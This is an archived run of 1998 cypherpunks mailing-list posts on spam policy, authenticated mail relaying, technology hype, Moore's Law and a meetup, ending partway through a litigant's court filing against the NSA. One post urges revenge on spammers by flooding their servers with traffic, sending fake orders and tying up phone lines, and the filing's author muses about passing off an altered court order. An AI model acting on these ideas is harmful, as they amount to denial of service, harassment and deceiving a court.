>ignoring it.  (Presume you can't shut off your pager.)  It takes away
>from the continuity of life.

But *many* things eat up our valuable time. Doesn't mean government action
is the answer.

>Further, some of us use ISDN to get their email and transferring the
>extra junk adds to the pay/minute connections.

If you use ISDN and pay minute charges to download an article from me, for
example, and you feel it was a waste of your valuable time, should my
article be illegal?

If someone sees your name somewhere and does the same thing (sends you a
letter), should this be illegal?

(I threw this last point in because some have argued that there is an
implicit agreement that mail on a mail exploder will not be objected to, as
it fits the charter, blah blah. So I removed this implicitness by speaking
of someone who writes a letter.)

If _content_ is not a criterion for spam, as Costner and others have noted,
then "wasting Ray's time" is even less of a criterion for what spam is.


Look, there's just not going to be a simple government answer to "unwanted
communications" that doesn't do serious damage to our liberties.

Technological/economic approaches are the only way to go.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 07:34:53 +0800
To: cypherpunks@Algebra.COM
Subject: Squelch discussions of the "spam problem"
Message-ID: <v03102815b1111e6934c2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Several lists I'm on are beating the spam problem once again. What to do
about it, whether government should step in, and so on.

Look, folks, I guarantee that the more everyone talks about the "spam
problem," even if most of us don't think it's a pressing problem, the more
likely it is that spam legislation will be introduced. And that won't be
good, whatever one thinks of spam.

Congress operates by catering to special interests and popular calls for
"action." Doesn't matter to them what action they take, so long as they can
hold up their "Digital Protectin and Children's Safe Surfing Act of 1998"
legislation.

The more jostling and chatter that goes on, the more likely Congressional
aides will start drawing up legislative language.

So, even if you think spam is a serious problem, I urge you to suppress the
desire to throw your two cents in on what kind of a horrible thing it is,
how its corrupting the nation's precious bodily fluids, and how *something*
must be done!

I guarantee you won't like the results you get, no matter your views on spam.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Thu, 19 Feb 1998 04:58:32 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <34EB48F9.352C6B61@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> I see discussion of spam here and everywhere on
> the net. But who finds it a *real* problem, and
> why?

It eats up your valuable time.  You might not see it for what it is, but
it is an interruption of normal service.  It's annoying as having your
pager go off durring sex and having to call back your boss instead of
ignoring it.  (Presume you can't shut off your pager.)  It takes away
from the continuity of life.

Further, some of us use ISDN to get their email and transferring the
extra junk adds to the pay/minute connections.

There are nice technical solutions to this.  If sendmail didn't transport
things unauthenticated it could be done, but at a cost in CPU cycles on mail
servers:

Have every sendmail server use a PK scheme to talk to every other
server and authenticate the connection.  Have every sendmail server accept
mail only from those whose key is verified.

Anonymous remailers would still work and these could be set up to accept
unauthenticated email, but then use their own credentials to send out
the mail, so it will auth with your servers.  Also have the anon remailers
not accept too many messages from one source within a certain time frame to
different destinations.  i.e. if I send out 50 messages to cypherpunks in
one hour, that's cool.  If I send out 50 messages to 50 different users
everywhere within an hour, it's not cool.

This way the spamming bitches would be forced to still register domain
names and send mail from them, and you can have your mail server block
them as needed and be certain of where they came from.  If you have
problems with anon users, you can block unsigned (and/or signed but
unrecognized) messages from anon users, while still allowing signed
messages of anons you know well and accept mail from.  

[Note: I said known anons, this prevents Spamfuckers from genning
10 billion key pairs to spam you with.]

(I won't get into persistant anonymous identities and reputation capital
as that's been beaten to death already.)

IMHO with such a scheme it will be possible to reactivate email relaying
again, it just requires everyone to gen their own DH or RSA keys.  The
mailer software can handle this for users, so it's of little issue.

The other side of the coin is that ISP's should include AUP clauses that
state if you spam, you pay extra $$$ and make it enforceable via contract.
Say, you pay shit.net $10/month for access, you'll have to sign a thing
that says if you use your account to spam, you'll have to pay $500,000
or something just as prohibitive, or release their real world info, 
(or whatever can be legally used to deter the fuckers.)

If any ISP's don't do this, or allow way too many spams, they get
filtered from your servers.

Mind you, this won't totally stop spammers, but it will make it hard 
for them.  Food for thought.  IMHO, with such fascist anti-encryption
laws today, this is unlikely to take off. :(

OTOH, the idea of pledging not to buy anything from spammers helps in
the long run, but there are enough sheep out there that will accept
any crap thrown in their mail.  Further, spamming them back helps.
If they put 800 numbers on the spam, call them and talk to them for
hours and waste their time.  If they put fax numbers in there, send
them orders with fake addresses.  If they put up net addresses, block
them from your router and/or flood them with extra traffic if you can
or want to.  If they put up PO addresses, subscribe them to many weird
magazines by sending in the fall out cards with their address on
it.  (seek legal advice before trying these, I'm just ranting and venting.)
:)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 05:58:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: New technology around the corner [slashdot.org] (fwd)
Message-ID: <199802182201.QAA12804@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 18 Feb 1998 11:32:21 -0700
> From: Jim Burnes <jim.burnes@ssds.com>
> Subject: Re: New technology around the corner [slashdot.org]

> Does anyone else get the feeling that we are on the cusp of
> serious exponential change in technology?   I know its been
> going exponential for a while, but now I'm really starting
> to feel it.

I have felt that way since the early 80's. The rate of technology
multiplication and some of the truly weird technologies that people said
wold never happen are happening. 

> 2. Flat Plastic Video Screens using Light Emitting Polymers "LEPs"
> (Cambridge)

Don't forget the fact that their test beds were done with *standard* ink-jet
printers with a modified head assembly.

> ObCrypto: Since polymer transistors seem to be necessary to implement
> polymer memory, how does this effect computation speed?  The polymer
> transistors must be around 30-40nm and low power.  How long until we
> have Polymer PGA,PALS,CPUs?  How fast will they be?  Is it time to add
> a few more bits to the public key?  Are there any cipher attacks that
> would benefit from obscenely large amounts of fast memory?  Sorry if
> this is a naive question to the theorists.

These are some of the exact same questions that I'm trying to add numbers to
myself... when we take the union of the computer, information processing,
networking, bio-engineering, transportation, etc. industries the various
predictions of Toffler and others seem woefuly short-sighted.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@iq.org
Date: Thu, 19 Feb 1998 02:27:01 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <19980218050405.1567.qmail@iq.org>
MIME-Version: 1.0
Content-Type: text/plain



> PS: I'm slightly anonymous in this message
> because I fear that if I used my real name,
> some jerk would decide to sign me up for
> every spam source on the planet, to prove
> a point.
> 
> M

Too late. Someone subscribed you to cypherpunks
already.

Cheers,
Julian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 19 Feb 1998 08:14:15 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: News & Truth
In-Reply-To: <199802171633.KAA03408@einstein.ssz.com>
Message-ID: <199802190007.QAA19951@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Jefferson:
>At a very early period in my life I determined never to put a sentence into
>any newspaper. I have religously adhered to the resolution through my life
>and have great reason to be contented with it. Were I to undertake to answer
>the calumnies of the newspapers it would be more than my time and twenty
>aids could effect. For, while I should be answering one, twenty new ones
>would be invented. I have thought it better to trust to the justice of my
>countrymen  that they would judge me by what they see of my conduct on the
>stage where they have placed me.

a friend of mine is studying Hamilton vs. Jefferson. it turns out
Hamilton loved newspapers and would write frequently under his own
name, or under a variety of pseudonyms. one biographer states he
assumed the personality of each as he wrote under them.  I think
Jefferson was at ill advantage in the face of Hamilton's tactics.


>No Government ought to be without censors; and when the press is free, no
>one ever will. Nature has given to man no other means of sifting out the
>truth either in religion, law or politics. I think it as honorable to the
>government neither to know nor notice its sycophants or censors as it would
>be undignified and criminal to pamper the former and persecute the latter.

this is pretty hard to parse until one understands that an old 
form of the word "censor", as I understand it, meant "to criticize".
so "censor" as a noun and verb should be replaced with "critic" and
"criticize" for the modern translation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 19 Feb 1998 05:21:10 +0800
To: cypherpunks@toad.com
Subject: Re: Is spam really a problem?
Message-ID: <199802182107.QAA00482@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From sunder@brainlink.com Wed Feb 18 15:58:46 1998
   >   
   >   Anonymous wrote:
   >   > 
   >   > I see discussion of spam here and everywhere on
   >   > the net. But who finds it a *real* problem, and
   >   > why?

Why are you asking the cypherpunks list?

   >   There are nice technical solutions to this.  If sendmail didn't transport
   >   things unauthenticated it could be done, but at a cost in CPU cycles on mail
   >   servers:
   >   
   >   Have every sendmail server use a PK scheme to talk to every other
   >   server and authenticate the connection.  Have every sendmail server accept
   >   mail only from those whose key is verified.

Nonsense.

We (NANA) already know where spam comes from,
and when we complain about it, they are terminated.

#   Date: Tue, 10 Feb PST  16:13:26 -0800
#   Message-Id: <199802110013.QAA23854@blaze.corp.netcom.com>
#   Subject: Re: Commercial spam complaint
#   From: abuse@netcom.com (NETCOM Policy Management)
#
#   Thank you for your report. This user's account has been terminated for
#   violations of NETCOM's Acceptable Use Guidelines.

PK authentication would change nothing.

Show a single spam with a forged IP address.

PK authentication would only lead us down the
road of everyone being tattooed with barcodes
of our own making - and incredibly dumb idea.
---guy

   It would be like requiring a smart card for Internet access.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 19 Feb 1998 08:19:37 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Websites and trademarks at odds [CNN]
In-Reply-To: <199802181552.JAA11020@einstein.ssz.com>
Message-ID: <199802190013.QAA20451@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the article states that it is difficult for consumers to
find companies when trademarks are not equivalent to 
web site addresses.

solution: a "trademark directory" web page-- say,
www.trademark.com. it gives the
official web site of all companies in the world. yahoo
is close to this but not quite. an opportunity for a 
budding entrepreneur. it would clearly be a very
high-traffic site, ripe with advertising possibilities.

added benefit:
it might cut down on the animosity going on over 
web site addresses, "poaching", and lawsuits over ownership.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 19 Feb 1998 08:22:03 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Squelch discussions of the "spam problem"
In-Reply-To: <v03102815b1111e6934c2@[207.167.93.63]>
Message-ID: <199802190018.QAA20938@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I strongly disagree with TCM about not talking about spam.

I have commented on the list many times about the very
difficult problem of spam and how its not something that
ought to be ignored. it *was* ignored many years ago
and is continuing to get worse. it will *continue* to
get worse until some good solutions are found.

however, I agree with TCM in that I despise a legislative
solution and think that it would be a very bad idea, and
lead to new odious bureacracies.

I do believe that the spam problem can be solved with
a technical solution, and I urge cypherpunks as a group 
(oops, that's taboo and an oxymoron) to attack it technically.
that is part of the problem-- imho it requires a cooperative
& collaborative solution, which tends to defy the loner and individualistic
mentality that permeates cyberspace. 

why can't cryptographic ingenuity be applied to this problem?
in many ways it is similar to problems of "denial of service"
that keep repeating all over cyberspace because it is a 
very difficult problem to solve.

I suspect reputation systems might be extremely useful in attacking the
problem, and supposedly this is a cpunk area.

I'm going to try to write up an essay soon on spam prevention based
on some of the ideas I have bouncing around in my brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 06:19:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: New technology around the corner [slashdot.org] (fwd)
Message-ID: <199802182222.QAA12937@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 18 Feb 1998 11:16:15 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: New technology around the corner [slashdot.org]

> No, I don't think we're on any kind of cusp of a growth curve. If anything,
> several things are slowing down.

Stricly speaking I would agree, we are *past* the cusp and on the upward
rush of the technology curve.

> Beware the "press release." The items above are just a few of literally
> thousands of such announcements.

Exactly! Only look at what people are actualy *doing* and not what they are
predicting. It's one of the reasons the vast majority of forwards in the
technology forum I send here are about things that have succeeded.

> Remember how "laser pantography" was going to revolutionize chip-making,
> and even make "back yard fabs" possible?

While the concept of a backyard fab has been pretty much blown out of the
water what *has* come around and *wasn't* predicted is the growth of
fab-less chip design companies. If you look at how these sorts of businesses
have grown since the late 80's onward it is astounding some of the custom
chips these firms are willing to design and get built through renting others
spare fab bandwidth.

> How about "silicon on sapphire"
> and how it would obsolete Integrated Injection Logic? (You don't remember
> I-squared L? Shame on you, as it was scheduled to put Intel out of business
> by 1976).

SoS technology was always predicted to win the game *if* the issues of
thermal expansion between the Silicon and Sapphire could be resolved. Also,
just as with Josephson Junction devices, other methods to achieve the same
levels of predicted performance at less cost were devloped. There must be
technologies that fail for there to be technologies to win. Simply pointing
at the failed ones as an example of why it can't happen is a strategy that
is doomed. There will always be some turk who has the self-confidence to say
it can be done and then does it.

> Or how about plastic cubes that can store terabytes. Or wafer scale
> integration. Or e-beam addressed memory. Or neural networks. Or fuzzy logic.

All of these technologies are out there. They haven't reached a point where
they're mature for a variety of reasons. Let's look at Terabyte storage for
a moment. Consider that the largest data bases on the planet are only a few
*hundred* Terebytes and of them there are only a few 10's of thousands.
Perhaps the reason the market hasn't taken off in this area is because the
market isn't large enough. Give it another 5-10 years so that computers have
become pervasive in schools, play, home, business, etc. (and no they are not
pervasive now) and the market forces to drive new material releases on CD
or other long-term media as the *primary* media (paper being so now) *and*
there becomes a market for the re-release of past books and material then
we'll begin to see a reason for each of us to be carrying around tera-bytes
of data.

Fuzzy logic and neural networks resolve your telephone switching issues,
are used to locate natural resources, filter intelligence data for threads,
etc. They're even used in coffee makers and micro-waves now.

e-beam addressed memory is a looser, and anyone with a clue back them would
have said so as well. Too power hungry, physicaly a bitch to haul around in
your shirt pocket, etc.

> ("Hey, Tim's being a negativist. My new rice cooker says it has fuzzy logic
> in it.")

See!

> And then there's the whole universe of speculation about quantum computers,

I *strongly* suggest folks follow the Quantum Coupled Architecture
developments over the next two years or so.

> DNA computers, nanotechnology, etc.

These are new technologies that are only a decade or two old. Consider
transisitors. The first FET transistor effects was discovered in the 30's
but it wasn't until the 50's that we actualy managed to build a working BJT
and several years after that till the FET based technology became feasible.
And there have been some interesting advances in these fields. DES being
cracked by a bio-logical computer a couple of years ago for example. The ARM
technology as well as the ability to not only understand but manipulate the
genetics and mechanics of nano-technology have only been around 5-10 years.
These are new technologies that are at the 'terrible-two's' stages of
development. It's clear they can do it, they just haven't figured out how.
And in the process they're rambling around the house opening every cubbard
and drawer dumping the contents out.

> The fact is that R&D labs partly run on hype. And journalists are willing
> to interview researchers to generate stories.

Until it's a reality it's *always* hype. Asking the technology to prove it
itself the first day is like asking a new born baby to talk or recite
Shakespeare. It's unreasonably demanding and self-deluding.

> A particularly interesting place to read about all the Latest and Greatest
> technologies destined to replace silicon is "Electronic Engineering Times."

You can see some pretty funny predictions in the Enquirer also...

It's a good thing to have an open mind, just not so open it sloshes out on
the ground.

> But I don't get overly excited by announcements of new developments like
> this. Perhaps following the industry for 25 years has made me jaded.

>From the stories of your personality and the demonstrations I've seen you're
a born cynic.


The street finds its own uses for technology.

                      William Gibson


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 06:50:26 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Moore's Law - What is it?
Message-ID: <199802182255.QAA13050@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Consider this,

Moore's Law has for the past few decades successfuly described the increase
in computer performance, at least within experimental error. It has proven
it's success, at least short term, from the school of hard knocks.

But what *is* Moore's Law? It clearly doesn't discuss the fundamental
technology of computing and its limitations. Is it in fact the mathematical
description of our understanding and ability to apply that comprehension to
the real world. Is it in fact a mathematical model of the limits of human
reasoning and not computing technology per se.

If Moore's Law is fundamentaly valid over the long-term it should be
applicable to other forms of human endeavor since the limits of human
reasoning and comprehension would seem to be a characteristic of our mind
and not a particular area of application.

What other forms of human exploration when examined in this light follow the
curve?

Perhaps Moore's Law is a measure of an ecomomic systems' ability to apply
and distribute technology to the society in a non-breakthrough, an ah-hah
experience where there is a fundamental shift of paradigm, environment.

If so, what other forms of economic expansion follow this curve?

However, if Moore's Law is only applicable to computing technology; Why?
Why should such a simple curve describe such a complex and inherently
non-deterministic area?


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 09:24:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New technology around the corner [slashdot.org]
In-Reply-To: <199802181626.KAA11323@einstein.ssz.com>
Message-ID: <v03102816b11139257c91@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:02 PM -0800 2/18/98, Anonymous wrote:
>Tim May wrote:
>
>> Or how about plastic cubes that can store terabytes....
>
>
>They work fine.  Just keep it in liquid nitrogen or you'll lose all your
>data.

Fine, I'll keep them in LN. Tell me where I can buy these terabyte cubes?
This would be news to Rentzepis and his cohorts.


>Backyard fabs?  Quite doable with MBE or electron beam lithography.  Just
>don't expect to do any mass-production on such a setup.

Neither MBE nor EBL handle more than a tiny subset of the steps needed. For
example, diffusion drives, implants, reactive etches, chem-mechanical
polishing, and a dozen other steps.

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Troy A. Bollinger" <troy@austin.ibm.com>
Date: Thu, 19 Feb 1998 08:13:27 +0800
To: cypherpunks@ssz.com
Subject: (forw) Re: Cypherpunks - Austin: Sat. Feb. 21 6-7pm, physical meet (fwd)
Message-ID: <19980218180749.12069@austin.ibm.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3989.1071713777.multipart/signed"

--Boundary..3989.1071713777.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

I made the mistake of replying back to austin-cpunks instead of this
list.  If anyone attending CFP this week in Austin would like to get
together let me know.  Or just show up on Saturday for the local meet.

Thanks,
Troy

----- Forwarded message from Jim Choate <ravage@ssz.com> -----

Message-Id: <199802181631.KAA11452@einstein.ssz.com>
Subject: Re: Cypherpunks - Austin: Sat. Feb. 21 6-7pm, physical meet (fwd)
To: austin-cpunks@ssz.com
Date: Wed, 18 Feb 1998 10:31:27 -0600 (CST)
In-Reply-To: <19980218101742.09049@austin.ibm.com> from "Troy A. Bollinger" at Feb 18, 98 10:17:42 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-austin-cpunks@ssz.com
Reply-To: austin-cpunks@ssz.com


Hi Troy,

> Well, I'm free to meet anytime this week.  I don't know what the
> schedule is for CFP, but if someone sends me a time and place I'll show
> up.

> > > Lots of us out-of-towners will be in Austin for CFP this week -- but the
> > > conference ends on Friday. People start leaving that evening or the next
> > > morning. And those of us are staying through Saturday are planning a day
> > > trip outside of Austin that won't get us back by 6 pm.
> > >
> > > Why not have a pre-meet, or the meet itself, during CFP?

You should send a notice to 'cypherpunks@ssz.com' so that your offer can be
propogated to the entire crew quickly.

Thanks for the effort.

----- End forwarded message -----

-- 
Troy Bollinger                            troy@austin.ibm.com
AIX Security Development        security-alert@austin.ibm.com
PGP keyid: 1024/0xB7783129 Troy's opinions are not IBM policy


--Boundary..3989.1071713777.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogUEdQIGZv
ciBQZXJzb25hbCBQcml2YWN5IDUuMApNZXNzYWdlSUQ6IEFOdUxHSTA5MThs
VHRlckRrTnBNZzByL2Q0a2NlR1EwCgppUUNWQXdVQk5PdDMwc2pxdkVtM2VE
RXBBUUdtaVFQN0J5YmEzMTl0QUdpUVFqUHB0VDlVczRZTjdWL0RqOWpkCm9k
dm5kbEVXV09IRWllVHNSWVV3cTk1R0JWZ1lhY0N4VFY0aEFzS3JuN0orVHN5
YUxxSGQ2ZytUdFdaY1RKVEUKaTBwL2ROV3o1bGR1ajg5TGVOdzhvQ3JWc3dk
a3cyV3FDQTNXKzdubmZ6MWtqenZ6aUF2dmNaM1J6QndoNXNLbgpIVm9KTE9j
blE3RT0KPVpmV04KLS0tLS1FTkQgUEdQIFNJR05BVFVSRS0tLS0tCg==
--Boundary..3989.1071713777.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 19 Feb 1998 09:47:28 +0800
To: j orlin grabbe <jy@jya.com
Subject: judicial authentication
Message-ID: <34EB8A58.AC4@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 2/18/98 6:04 PM

J Orlin Grabbe
John Young

Authentication

John Young has been sent a copy of  ORDER with SEPARATE
PAGE marked

	FILED
	UNITED STATES DISTRICT COURT
    	ALBUQUERQUE, NEW MEXICO
	February 10, 1998



	US District Court
	District of New Mexico
	Digital File Stamp

...

 This document consists of an official stamp of the Court and, if
attached to the
document identified above, servers and endorsed copy of the pleading. 
It may be
used in lieu of the Court's mechanical file stamp for the named document
only, and
misuse will be treated the same as misuse of the Court's official
mechanical file
stamp.  The Court's digital signature is a verifiable mathematical
computation unique
to the filed document and the Court's private encryption key.  This
signature assures
that any changes can be detected.

Attached is Svet's ORDER.  WITH NO MARKINGS ON IT.

Grabbe, perhaps I should modify the ORDER SLIGHTLY and return this to
the court
claiming that I believe that I have recieved a COUNTERFEIT COPY of
Svet's
decision.

And, would the court please verify if the copy I sent them was authentic
or not.

And, too, tell me WHY they knew that it was a counterfeit or authentic.

But this is why we have back-ups.

ALLAHU AKBAR!

Perhaps the opposition has more brains than our [?] side.

But first things first.

bill


                     UNITED STATES DISTRICT COURT
                 FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	   	    		)
Arthur R. Morales                           			)
                                            				)
                Plaintiffs,                 			)
                                            				)
v                                           				)	CIV NO 97 0266 
							)	SC/DJS
			                    			)
Lieutenant General Kenneth A. Minihan, USAF 	)
Director, National Security Agency	    		)
National Security Agency		    		)
                                            				)
                Defendant                   			)


PLAINTIFFS'  RESPONSES TO JUDGE SVET'S ORDER FILED January 28, 1998, ORDER FILED February 10, 1998, AND AFFIDAVIT OF ATTORNEY FEE IN ACCORDANCE WITHCOURT ORDER FILED 98 FEB-9


1  COMES NOW plaintiffs Payne  and Morales [Plaintiffs] to respond

to two ORDERs and AFFIDAVIT.

2  Magistrate judge Svets [Svet] writes in ORDER filed January 28, 1998.

  IT IS FURTHER ORDERED THAT sanctions will be granted and 
  counsel for Defendant shall submit an affidavit outlining her costs
  and fee in bring the Motion within ten days of entry of this Order.
  Plaintiffs may respond within ten days of service of Defendant's     
  affidavit.

3 Svet states in ORDER filed January 28, 1998

 Plaintiff's attempt at discovery violates this Court's Order entered June
 11 , 1997.

4 June 11 order states,

  THIS MATTER come before the Court sua sponte following 
  an Initial Scheduling Conference held June 5, 1997.  The 
  establishment of deadline for discovery and pre-trial pleading is 
  necessary for the orderly hearing of this case. However, this case 
  in not one in which an Initial Pre-trial pleading will assist the 
  Court.  Accordingly, such a document will not be entered.  Further, 
  the parties will not be permitted to undertake any discovery in this 
  matter absent Court permission.  The parties shall submit any 
  proposed discovery to the Court for approval, accompanied by a 
  motion to permit discovery and a memorandum of points and 
  authorities explaining the need for that discovery.

     IT IS THEREFORE ORDERED that the following deadlines 
  are hereby established:

     1.   The parties shall complete discovery necessary by 
     September 3,
     1997.
     2.   Motions relating to discovery shall be filed no later 
     than September 23, 1997.
     3.   All pretrial motions regarding matters other than 
     discovery shall be filed by October 3, 1997.
     4.   The Pre-Trial Order shall be provided as follows:
     Plaintiffs to Defendants by November 3, 1997;  
     Defendants to the Court by November 18, 1997.

  IT IS FURTHER ORDERED that discovery in the matter shall only be 
  undertaken upon obtaining Court permission.  The parties shall 
  submit any proposed discovery to the Court for approval, 
  accompanied by a motion to permit discovery and a memorandum of 
  point and authorities explaining the need for that discovery.

                    signed
                    DON J. SET
                    UNITED STATES MAGISTRATE

5 Plaintiff's point out in UNOPPOSED MOTION FOR EXTENSION 

OF TIME AND  RESETTING TIME LIMITS FOR DISCOVERY

  Rule 36 states, 
 
  Request for admission (a) A party may serve upon any other 
  party a written request for the  admission, for the  purposes of 
  the pending action only, of the truth of any  matters within the  
  scope of Rule 26(b) set forth the request that relate to statements 
  or opinions of fact or of the application of law to fact including 
  the genuineness of any documents described in the request.   
  Copies of documents shall  be served with the request unless 
  they have been or otherwise  furnished or made available for 
  inspection and  copying.  The request may WITHOUT LEAVE  
  OF THE COURT, be served  upon the plaintiff after 
  commencement of  the action and upon any  other party with 
  or after service of the  summons and complaint upon that 
  party. ... 
 
  Plaintiffs capitalize WITHOUT LEAVE OF THE COURT.

6  Svet writes in ORDER filed January 28, 1998

  On June 11, 1997 this Court ordered that any proposed 
  discovery must be approved by this Court.

Svet's above sentence violations Rule 36 of the Federal Rule
 
of Civil Procedure.

7 Svet writes in ORDER filed January 28, 1998

  Further, Plaintiff's did not seek to take discovery prior to the
  discovery deadline.

Svet FAILED TO RESPOND to Plaintiffs' UNOPPOSED MOTION 

FOR EXTENSION OF TIME AND  RESETTING TIME LIMITS 

FOR DISCOVERY.

8 Svet writes in ORDER filed January 28, 1998

  Finally, Plaintiffs, failed to serve counsel for Defendant and 
  instead served General Minihan.  This violates Fed. R. Civ 5.

Plaintiffs DID SERVE General Minhan with first set of admissions

through US lawyer Mitchell on October 13, 1997 in full compliance with

Fed. R. Civ 5.

9 Svet writes in ORDER filed January 28, 1998

  The fact that Plaintiffs are pro se does not relieve them from the burden
  of complying with court orders and rules of civil procedure.

To the contrary, Svet flaunts in writing his disregard of truth and rules

of Civil Procedure.

  Plaintiff have always attempted to follow the Federal Rules of Civil 

Procedure and were always willing to correct any mistakes.

  Svet, on the other hand, proceeds with an attempt to ignore the laws

IN WRITING of the United States.

  Friday October 24, 1997 08:10 file criminal complaint affidavit with

Supreme Judge Antonin Scalia against judges Svet and Campos.

  Scalia has not yet responded to Plaintiffs' criminal complaint affidavit.

  Svet, by issuing ORDER filed January 28, 1998, must believe that Scalia

is going to cover-up for Svet's and Campos' judicial misconduct.

10 Svet writes in ORDER filed January 28, 1998

  Further, Plaintiffs flagrant disregard of this Court's order warrants
